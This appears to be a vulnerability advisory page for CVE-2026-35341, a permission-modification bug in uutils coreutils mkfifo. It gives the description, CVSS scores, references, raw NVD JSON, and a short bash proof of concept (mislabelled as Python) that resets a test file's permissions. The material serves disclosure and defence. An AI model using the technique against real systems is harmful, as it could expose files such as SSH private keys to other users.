CVE-2026-35341

Description

A vulnerability in uutils coreutils mkfifo allows for the unauthorized modification of permissions on existing files. When mkfifo fails to create a FIFO because a file already exists at the target path, it fails to terminate the operation for that path and continues to execute a follow-up set_permissions call. This results in the existing file's permissions being changed to the default mode (often 644 after umask), potentially exposing sensitive files such as SSH private keys to other users on the system.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:* - VULNERABLE

uutils coreutils (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# PoC for CVE-2026-35341: Permission modification via mkfifo

# 1. Create a sensitive file with restrictive permissions (e.g., SSH key)
touch /tmp/target_file
chmod 600 /tmp/target_file
echo "Initial permissions:"
ls -l /tmp/target_file

# 2. Execute the vulnerable mkfifo command on the existing file
# This simulates a user or script attempting to create a FIFO
mkfifo /tmp/target_file

# 3. Check the permissions after the command
echo "Permissions after mkfifo:"
ls -l /tmp/target_file

# Expected result on vulnerable version: Permissions change to 644 (or umask default)
# making the file readable by others/group.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35341
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35341
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35341/
[4] VulDB https://vuldb.com/cve/CVE-2026-35341
[5] https://github.com/uutils/coreutils/issues/10020

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35341", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:36.060", "lastModified": "2026-04-24T19:05:55.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in uutils coreutils mkfifo allows for the unauthorized modification of permissions on existing files. When mkfifo fails to create a FIFO because a file already exists at the target path, it fails to terminate the operation for that path and continues to execute a follow-up set_permissions call. This results in the existing file's permissions being changed to the default mode (often 644 after umask), potentially exposing sensitive files such as SSH private keys to other users on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:uutils:coreutils:-:*:*:*:*:rust:*:*", "matchCriteriaId": "4A9AF9E4-E17C-48AD-8051-B49998618839"}]}]}], "references": [{"url": "https://github.com/uutils/coreutils/issues/10020", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}